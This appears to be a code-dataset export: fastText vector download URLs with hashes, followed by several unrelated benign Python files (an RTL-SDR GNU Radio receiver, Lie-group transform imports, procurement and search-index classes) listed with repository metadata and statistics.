"b0ff031a60938b612f9b0c9612bd206cbb1f5288a6ee3482d116174b81d9269f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kv.vec":
"a6202b11f869683ce75e60bf206c230109f91b651801dc6ea07b3b7f2c5c9b32",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.kw.vec":
"061e26d970aa7cb3fded9278372a53d0dd8359abc664caa385edaac9aac1359d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ku.vec":
"7f117b704d5ac791463796b1ac2d833717c0cfc75dbfb50c2e80aa0c9348c448",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ky.vec":
"adb5c72c47c514cd5417f46f8a7baba4061063b0e75c2d0b2e42dc08144af6cf",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lb.vec":
"566334801777746bc2c1076e1b24a8281e10fe31f0db30a2a4b0b490033e6d04",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.li.vec":
"50a1054a31a7e11f5bd3fe980e1646205284e540fb1be3ae88f4bf16b0d10301",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lez.vec":
"109c3f3fee8970cfab1b7152315816284aa4b5788403d4007866ad417a63b5e6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.la.vec":
"ca3b46e03bebf6b937cd7f01c29566b7d48d94d3de033a527ce45744a40ea00a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lo.vec":
"acd1a8cbabbfc50196cb3dfeb9e82c71409c40ae90dc3485044396bbb7350431",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lmo.vec":
"26952850a5569e8241d1e6ff2d6877fa51b6715e8fdeec9bf5f9d716e94c958e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lt.vec":
"54bc7d3c1ef600f4710047c4dafd1346e8b53bd29a327bc132f6a9fd0c14b8c7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lrc.vec":
"24d6c530275176cb03e566e9e5737a1680e79854e6c0a2da19a7cb27a029a0ce",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.lv.vec":
"ed93e318306e19cc18154b095a2494d94ab061009c3a8fa1c3501495f81b7198",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mg.vec":
"12ab899108b74bbee8b685ed7f4941719485560c7346875a0be79c7ba6dbec2a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mai.vec":
"387a5d1194e8e441b09c7a215a71cad75e6e1a0777c08f90b2ed5bf4e90423d3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mhr.vec":
"080cb31ff85f0bc21ae75b66311214d594f76a7fdf17699aa5ba8239c6ccd164",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mk.vec":
"ea3d8e77ba3cf17c516e7d0c93e45a73a5e54b1b245ddb65351826678fe102d1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.min.vec":
"13fac5abbd2053365c5570edea2017e2a6d814e682a8e906d92b3deaa761b741",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ml.vec":
"69eafbab72db69278acec01ff8883d41d616f8aaa59e473faafc115996db5898",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mn.vec":
"a1ec46e780d2f42633ffbe363ce17b1f700fa6744ce40b5a19446a714b9066d8",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mr.vec":
"e30ee3d90d6687868cc6dee609e4d487b81362ea231e8456f8265bace55c7ffb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ms.vec":
"71ebc8bc0959a592e071db35995119ee33fc17ff61611e6ea09ea6736b317f17",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mrj.vec":
"93351fb85f38523fbf3767fac32625f26be37582afbddfef258642f4530f4ab9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.my.vec":
"5a8216d0df2d70e5517bcb4cbe523fc03d34f802a83d04a88faadfff7b700b9f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mwl.vec":
"6997a71b0a745c124135d6c52196d14412d4068fca8aa13b2b3b9598b933cf38",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mt.vec":
"f07a6071fcb3bcda4c6c5e6a0ebe6f3f5d228e8c1fc7ef5160cc3dd098718e98",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.myv.vec":
"ffebdb940b95fe76f3885e8853f3d88ebf9a23c24f64ccdf52c9a269a3f4d459",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nah.vec":
"2b1fc52e4a4901d824070d1e5fc2196f33c6d787edb8ce3732ace1d05407788e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.mzn.vec":
"692f68fa5537a690720f9c2ce0a2c5edaa0d06fe04b2749d169a178aecf751ad",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nap.vec":
"954aa926c6d47882c2397997d57a8afde3e0ca851a42b07280d6e465577f6925",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ne.vec":
"8d4bf875ca4733d022d4f415777dc2f9e33a93ddc67361add30aed298bc41bc6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nds.vec":
"767dcf37a6018cce9f885b31b3c54671199c0f9554ffb09112130b62144556db",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nl.vec":
"d0601975d00d672ad03a3b146c13c4b6240111d286834e385853e2a25f4fb66a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.new.vec":
"b7328d5408d91bbdc7ee7a9fd6761af322ea8ddb35a405a60826a5b7e327dd29",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.nn.vec":
"c2d2617c932bb49ba64bea9396435ce882fc4238e3983081967658891d18309e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.no.vec":
"762670d35c29910a0daa86444a1b32d4fd9c94deff82c53abe751c5463dcb025",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.or.vec":
"b1d97ba3d93b37903266b551e164fc9e51c7d5a429e77330cb281fb7de28bd71",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.os.vec":
"c249450a7cb5750c39a9121658b91055a0f5cccfe67c1879706a8bced390bebd",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.oc.vec":
"a4bb95b2fc28e82c5c976af32d632e5241daeeaea2bca2cb3300ad036619c0f6",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pam.vec":
"b0dd33c3f7e85805b1937d95d73194f3834f40a43a92c12544911ab30818cd20",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pa.vec":
"61462550fac53d8156c2e61f738b63ef0639949b87d8abeb566194dc86b1a488",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pl.vec":
"9c2674431e796595c8c1d3b5e1a941c7e833d23cad223d6e4d1c36447af5f3cc",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pfl.vec":
"889a62dbb945033bfc53516b976042df7791c0aa8290dcb92f12240685d2d2c1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pnb.vec":
"7c26c9297b15a75bb1f2bfeb8f11dd3c55821a06bd64fe7a105699ed4d9d794a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ps.vec":
"e718dfda7790cb309e37f0d42400afebf6036aa018dcd7eb330d576bb5c55030",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.qu.vec":
"b71076861dc0221acf540d4abbf6e760a2871c2dc380556fc7bad402d26ec738",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pms.vec":
"33a90387e8b75c09980b4c80171cabaae38e9b87de7bf320ecd93c344afaeb39",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.rm.vec":
"9a7f0690c8b42c96a1ad50bb8e7da5d69a3a9f7f0676289243319553a10aac41",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ro.vec":
"e19b3e99a6eae03c15dc5f5d7385beb2540528ee102501499b7ca846c2687d83",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.pt.vec":
"bffbfcafb9f004f13f1be12fa0201c5011324b14a52c2996ae2b97f268819e0c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.rue.vec":
"cb0aa15cb7816337509ed1b95c8844928a38d29e392e4e5295f35593e633b222",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sa.vec":
"6a303056d4841496599595be06fdcdf28ab5a2fc611c3428d95a3af9d4df0067",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ru.vec":
"9567b90e037c459eb4be4c2a47a04fffbfd5b0d01b84baf86b16535f0dc3728e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sah.vec":
"670a7c98a6c4bf6444b1a26213a5c8114d41c68006b4f32f6dee96558494076d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sc.vec":
"52abeb74f579f53b3c8bb55ae5cd8bbf8878c7083e61c693c0f7c8d289e80248",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.scn.vec":
"ad8e57aba916c6ab571157c02098ad1519c8f6ce1e72f35538efe1cb488a1a25",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sd.vec":
"7906a45f27aa65ba3d5cb034f56d2852d54d9ec3301b9df345f1a12a6cef9d7a",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sco.vec":
"eafc948e3e9e20aac5e7986979b3b3275c1acb2944e07b9b58d964da61408ff7",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sh.vec":
"36dc95a0fc0de137421df0b86eb7c55faff04d30b26969ae1fa331631824276d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sk.vec":
"dd9f51e48a55fe63c5cf901c9ce0bd6baab249ac51135a1b4cdb4e12f164687b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sl.vec":
"2ab76744a9d5321b6709b4ff379fb10495e004f72f6f221965028d6ee1cffd1e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.so.vec":
"28025afd6be6c8166898af85eb33536b111753fbf30e363beb7c064674c6d3c4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.si.vec":
"112246c583380fcf367932b55e5d42d5ffc12b8c206f981deae24fd4c61b7416",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sq.vec":
"4b4850d700aa1674e44bf733d6e2f83763b1ce9f0e7dfd524eb2c1b29c782631",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sr.vec":
"713f24f861cf540e3e28882915a89023cde222b6edb28fac7fb45b9bd894042e",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sv.vec":
"d21b96312bcf64faf1cd972d6eff44cd4a5afc575ff5c8f9b31d2d8819f56fca",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.su.vec":
"b763d1c6471320b071ad2009a82dc6fb0ffeaf07319562438f84cfcb2718e2a4",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.sw.vec":
"b9e17565d44cfba3c120274fd359b371c3b8d969b973e77ada3357defa843c79",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.te.vec":
"2d684ba8af330a716f732f9581c7faee80322232e02713d441130f304af8a897",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tg.vec":
"e2ed18d08da76bff25f2170452365aa341e967114a45271a8ba8d9cefc062aef",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.th.vec":
"079fadf992d34ae885ce5d7c23baa10aea4ee971147993b007d8bf0557906a18",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ta.vec":
"a3cedbf2ce4adb5a8b3688539ef37c6c59047d8d20ffd74e2e384ffcac588ac1",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tk.vec":
"05f0ccf5f6a2bdf6073e16f11c7a2327ebe4d12610af44051872d4fea32591ec",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tl.vec":
"a524621cefca337c5b83e6a2849afd12100fcd59bd7f3b228bddb4fb95cb17ea",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tr.vec":
"4cf567dbb73053bb7b08370e89ec6a7c5626e397e71de99637e70c68ba4c71d9",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tt.vec":
"6dc86b913c0375b204f1c8d7c8543d80888030693ed4ebef10c75e358c17d0fa",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.tyv.vec":
"b8a687337b3e7f344b9aecff19306c7a1cb432cdc03b46fd2f2e9e376be3073c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.uk.vec":
"186523ce3be943f9ecae127155371c494192564d1dffe743ab5db8ba28e50874",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ug.vec":
"04184a3a6be245e55f09c04856acc14f687adc4b802aaf875bf5883a1669a856",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.ur.vec":
"df38c3cf123edf09366f47ea694c02dec59929df218ca81d5aa69d77552b6865",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.uz.vec":
"f6289fa8cf2ff936a1716a5cf8fd07da46907af26b1236403a292273f2d8fb55",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vec.vec":
"c6d786f4231f30b4116a8dce181b2513b40b55a654c60793a5c0566152287aeb",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vls.vec":
"2f430e1d83f0f00fef517f7d35505bcf1445dc7de0db4f051ae7315f1bb0647b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vep.vec":
"81268d74e29bbae9f166d523151d12c246ff26be9cd680344faece7e1ca97ebe",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vi.vec":
"206206d496697de7e96c69500e926014c9f71c7115c3844350766ced21d7003f",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.war.vec":
"51b58d0ace2779b17b88a5b51847a813042e2b018ada573e0bce5a093da5ff4d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.wa.vec":
"37aee21a768a5883f6bee4a486040883224a93619b8b03dcefb1e939b655cd1c",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.vo.vec":
"4fa6a6ff897a1a49470861d343792feac0ca16e02e9ed1917f1506245ac28b2d",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.wuu.vec":
"09a619a8ef25392bf8905d741cdb63922a115e05b38f56de27c339985691c5d2",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.xal.vec":
"bf9ad172c55d8910e0156953158a9cb1f9cbcc6b9b1e78cf09c123d3409af5e3",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yi.vec":
"75dc1cad2a4dad5ad7d7723ef0b8e87abe3f4b799e9c38c54f4afe51d916a82b",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yo.vec":
"c8aa49859debb8b3d1568bb510e12814d55ce5994f0cc6dc43ca9b2c4f739946",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.xmf.vec":
"94ffed6fc1123523d72e3b92d0d3cc5513c116b9e9b2bba5d8b47f7b6fce6abd",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.yue.vec":
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.zh.vec":
"76f72bd13269ae492715415ef62afb109046ce557f5af24e822b71f9b9360bef"
}
| 55.623298 | 142 | 0.754943 | 3,362 | 36,767 | 8.295062 | 0.181142 | 0.09574 | 0.13963 | 0.15867 | 0.42599 | 0.415017 | 0.407774 | 0.398953 | 0.098788 | 0.083656 | 0.009084 | 0.227837 | 0.125928 | 36,767 | 660 | 143 | 55.707576 | 0.629555 | 0.119809 | 0 | 0.057143 | 0 | 0 | 0.769077 | 0.379113 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02449 | false | 0 | 0.014286 | 0.002041 | 0.063265 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
72c76ab535d04cf07f8762e82c71d4b88053ebeb | 406 | py | Python | relie/__init__.py | pimdh/relie | d34ed58bcbd82335d29e9dfb2c6170dbd83fd18f | [
"MIT"
] | 38 | 2019-03-07T14:23:59.000Z | 2022-03-17T02:23:22.000Z | relie/__init__.py | pimdh/relie | d34ed58bcbd82335d29e9dfb2c6170dbd83fd18f | [
"MIT"
] | 2 | 2022-03-01T12:20:21.000Z | 2022-03-15T14:28:23.000Z | relie/__init__.py | pimdh/relie | d34ed58bcbd82335d29e9dfb2c6170dbd83fd18f | [
"MIT"
] | 4 | 2019-03-18T05:09:55.000Z | 2022-02-27T16:38:48.000Z | from .local_diffeo_transform import LocalDiffeoTransform
from .local_diffeo_transformed_distribution import LocalDiffeoTransformedDistribution
from .lie_multipy_transform import (
LieMultiplyTransform,
SO3MultiplyTransform,
SE3MultiplyTransform,
)
from .so3_exp_transform import (
SO3ExpTransform,
SO3ExpCompactTransform,
SO3ExpBijectiveTransform,
)
from .so3_prior import SO3Prior
| 29 | 85 | 0.834975 | 34 | 406 | 9.676471 | 0.617647 | 0.136778 | 0.091185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022599 | 0.128079 | 406 | 13 | 86 | 31.230769 | 0.90678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.384615 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
72e2c40f5256fc1d6cc6cc8586a951cad1086f7f | 3,604 | py | Python | src/urh/dev/gr/scripts/rtl-sdr_recv.py | awesome-archive/urh | c8c3aabc9d637ca660d8c72c3d8372055e0f3ec7 | [
"Apache-2.0"
] | null | null | null | src/urh/dev/gr/scripts/rtl-sdr_recv.py | awesome-archive/urh | c8c3aabc9d637ca660d8c72c3d8372055e0f3ec7 | [
"Apache-2.0"
] | null | null | null | src/urh/dev/gr/scripts/rtl-sdr_recv.py | awesome-archive/urh | c8c3aabc9d637ca660d8c72c3d8372055e0f3ec7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
##################################################
# GNU Radio Python Flow Graph
# Title: Top Block
# Generated: Fri Aug 21 15:56:13 2015
##################################################
from optparse import OptionParser
from gnuradio import gr
from gnuradio.eng_option import eng_option
from grc_gnuradio import blks2 as grc_blks2
from InputHandlerThread import InputHandlerThread
import osmosdr
class top_block(gr.top_block):
def __init__(self, samp_rate, freq, gain, bw, port):
gr.top_block.__init__(self, "Top Block")
##################################################
# Variables
##################################################
self.samp_rate = samp_rate
self.gain = gain
self.freq = freq
self.bw = bw
##################################################
# Blocks
##################################################
self.osmosdr_source_0 = osmosdr.source(args="numchan=" + str(1)+ " " + "rtl")
self.osmosdr_source_0.set_sample_rate(samp_rate)
self.osmosdr_source_0.set_center_freq(freq, 0)
self.osmosdr_source_0.set_freq_corr(0, 0)
self.osmosdr_source_0.set_dc_offset_mode(0, 0)
self.osmosdr_source_0.set_iq_balance_mode(0, 0)
self.osmosdr_source_0.set_gain_mode(False, 0)
self.osmosdr_source_0.set_gain(gain, 0)
self.osmosdr_source_0.set_if_gain(gain, 0)
self.osmosdr_source_0.set_bb_gain(gain, 0)
self.osmosdr_source_0.set_antenna("", 0)
self.osmosdr_source_0.set_bandwidth(bw, 0)
self.blks2_tcp_sink_0 = grc_blks2.tcp_sink(
itemsize=gr.sizeof_gr_complex * 1,
addr="", # Vorher 127.0.0.1
port=port,
server=True,
)
##################################################
# Connections
##################################################
self.connect((self.osmosdr_source_0, 0), (self.blks2_tcp_sink_0, 0))
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.osmosdr_source_0.set_sample_rate(self.samp_rate)
def get_gain(self):
return self.gain
def set_gain(self, gain):
self.gain = gain
self.osmosdr_source_0.set_gain(self.gain, 0)
self.osmosdr_source_0.set_if_gain(self.gain, 0)
self.osmosdr_source_0.set_bb_gain(self.gain, 0)
def get_freq(self):
return self.freq
def set_freq(self, freq):
self.freq = freq
self.osmosdr_source_0.set_center_freq(self.freq, 0)
def get_bw(self):
return self.bw
def set_bw(self, bw):
self.bw = bw
self.osmosdr_source_0.set_bandwidth(self.bw, 0)
if __name__ == '__main__':
parser = OptionParser(option_class=eng_option, usage="%prog: [options]")
parser.add_option("-s", "--samplerate", dest="samplerate", help="Sample Rate", default=100000)
parser.add_option("-f", "--freq", dest="freq", help="Frequency", default=433000)
parser.add_option("-g", "--gain", dest="gain", help="Gain", default=30)
parser.add_option("-b", "--bandwidth", dest="bw", help="Bandwidth", default=200000)
parser.add_option("-p", "--port", dest="port", help="Port", default=1337)
(options, args) = parser.parse_args()
tb = top_block(float(options.samplerate), float(options.freq), int(options.gain),
float(options.bw), int(options.port))
iht = InputHandlerThread(tb)
iht.start()
tb.start()
tb.wait()
| 35.333333 | 98 | 0.574639 | 458 | 3,604 | 4.237991 | 0.237991 | 0.133952 | 0.166409 | 0.176198 | 0.313756 | 0.303452 | 0.214838 | 0.149408 | 0.072128 | 0 | 0 | 0.031829 | 0.206715 | 3,604 | 101 | 99 | 35.683168 | 0.647079 | 0.041065 | 0 | 0.117647 | 1 | 0 | 0.051509 | 0 | 0.014706 | 0 | 0 | 0 | 0 | 1 | 0.132353 | false | 0 | 0.088235 | 0.058824 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
72fdbac14052661983571da339e61ae14080d95f | 352 | py | Python | ocdskingfisher/sources/digiwhist_greece.py | odscjames/lhs-alpha | d882cadfcf3464fd29529cb862567dc311d892e2 | [
"BSD-3-Clause"
] | null | null | null | ocdskingfisher/sources/digiwhist_greece.py | odscjames/lhs-alpha | d882cadfcf3464fd29529cb862567dc311d892e2 | [
"BSD-3-Clause"
] | null | null | null | ocdskingfisher/sources/digiwhist_greece.py | odscjames/lhs-alpha | d882cadfcf3464fd29529cb862567dc311d892e2 | [
"BSD-3-Clause"
] | null | null | null | from ocdskingfisher.sources.digiwhist_base import DigiwhistBaseSource
class DigiwhistGreeceRepublicSource(DigiwhistBaseSource):
publisher_name = 'Digiwhist Greece'
url = 'https://opentender.eu/download'
source_id = 'digiwhist_greece'
def get_data_url(self):
return 'https://opentender.eu/data/files/GR_ocds_data.json.tar.gz'
| 32 | 74 | 0.769886 | 40 | 352 | 6.575 | 0.75 | 0.114068 | 0.129278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133523 | 352 | 10 | 75 | 35.2 | 0.862295 | 0 | 0 | 0 | 0 | 0 | 0.338068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f4023690edb91711781a5d94ba2c231e08af6e6b | 375 | py | Python | aioalice/types/uploaded_image.py | mahenzon/aioalice | f87b2e24c42444b5cb274c95eff20555314ec4f6 | [
"MIT"
] | 33 | 2019-09-22T16:35:40.000Z | 2022-03-24T11:24:05.000Z | aioalice/types/uploaded_image.py | mahenzon/aioalice | f87b2e24c42444b5cb274c95eff20555314ec4f6 | [
"MIT"
] | 7 | 2019-09-26T17:43:01.000Z | 2021-02-24T21:08:48.000Z | aioalice/types/uploaded_image.py | mahenzon/aioalice | f87b2e24c42444b5cb274c95eff20555314ec4f6 | [
"MIT"
] | 11 | 2019-09-26T09:51:59.000Z | 2022-03-14T16:14:12.000Z | from attr import attrs, attrib
from aioalice.types import AliceObject
@attrs
class UploadedImage(AliceObject):
"""This object represents an uploaded image"""
id = attrib(type=str)
origUrl = attrib(default=None, type=str)
# origUrl will be None if image was uploaded from bytes, not by url
@property
def orig_url(self):
return self.origUrl
| 23.4375 | 71 | 0.709333 | 51 | 375 | 5.196078 | 0.686275 | 0.05283 | 0.10566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213333 | 375 | 15 | 72 | 25 | 0.898305 | 0.285333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0.111111 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f40bc73eab50e47be9b1761b0fe8a7a72b02410d | 413 | py | Python | test_haystack/discovery/search_indexes.py | lvelezsantos/django-haystack | 3bb3275cd009f1bddd7e307621c3140922ae4659 | [
"BSD-3-Clause"
] | 3 | 2020-06-05T14:54:25.000Z | 2020-06-05T14:54:31.000Z | test_haystack/discovery/search_indexes.py | lvelezsantos/django-haystack | 3bb3275cd009f1bddd7e307621c3140922ae4659 | [
"BSD-3-Clause"
] | 1 | 2020-09-18T05:23:52.000Z | 2020-09-18T05:23:52.000Z | test_haystack/discovery/search_indexes.py | lvelezsantos/django-haystack | 3bb3275cd009f1bddd7e307621c3140922ae4659 | [
"BSD-3-Clause"
] | 3 | 2018-02-12T12:05:09.000Z | 2018-02-28T11:23:50.000Z | # encoding: utf-8
from test_haystack.discovery.models import Bar, Foo
from haystack import indexes
class FooIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="body")
def get_model(self):
return Foo
class BarIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
def get_model(self):
return Bar
| 21.736842 | 62 | 0.733656 | 52 | 413 | 5.75 | 0.538462 | 0.120401 | 0.167224 | 0.227425 | 0.58194 | 0.441472 | 0.441472 | 0.441472 | 0.441472 | 0 | 0 | 0.002933 | 0.174334 | 413 | 18 | 63 | 22.944444 | 0.8739 | 0.03632 | 0 | 0.2 | 0 | 0 | 0.010101 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
f41e12d53697af81b3c1794e13510769f00f3b1f | 1,393 | py | Python | angelos-portfolio/test/test_node_validate.py | kristoffer-paulsson/angelos | 2ec236770d6530884a8ad88505aab01183f752b4 | [
"MIT"
] | 8 | 2020-06-07T23:26:34.000Z | 2022-03-28T00:20:34.000Z | angelos-portfolio/test/test_node_validate.py | kristoffer-paulsson/angelos | 2ec236770d6530884a8ad88505aab01183f752b4 | [
"MIT"
] | 1 | 2019-12-24T22:06:02.000Z | 2020-07-12T19:18:57.000Z | angelos-portfolio/test/test_node_validate.py | kristoffer-paulsson/angelos | 2ec236770d6530884a8ad88505aab01183f752b4 | [
"MIT"
] | null | null | null | #
# Copyright (c) 2018-2020 by Kristoffer Paulsson <kristoffer.paulsson@talenten.se>.
#
# This software is available under the terms of the MIT license. Parts are licensed under
# different terms if stated. The legal terms are attached to the LICENSE file and are
# made available on:
#
# https://opensource.org/licenses/MIT
#
# SPDX-License-Identifier: MIT
#
# Contributors:
# Kristoffer Paulsson - initial implementation
#
"""Security tests putting the policies to the test."""
from unittest import TestCase
from angelos.common.policy import evaluate
from angelos.lib.policy.types import PersonData
from angelos.portfolio.domain.create import CreateDomain
from angelos.portfolio.entity.create import CreatePersonEntity
from angelos.portfolio.node.create import CreateNode
